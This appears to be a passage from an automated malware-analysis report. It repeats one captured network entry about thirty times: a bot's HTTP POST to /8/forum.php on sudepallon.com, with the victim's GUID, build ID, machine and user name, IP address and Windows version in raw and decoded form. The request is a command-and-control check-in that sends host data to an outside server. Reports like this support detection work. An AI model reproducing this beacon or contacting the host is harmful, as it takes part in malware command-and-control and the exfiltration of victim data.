                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
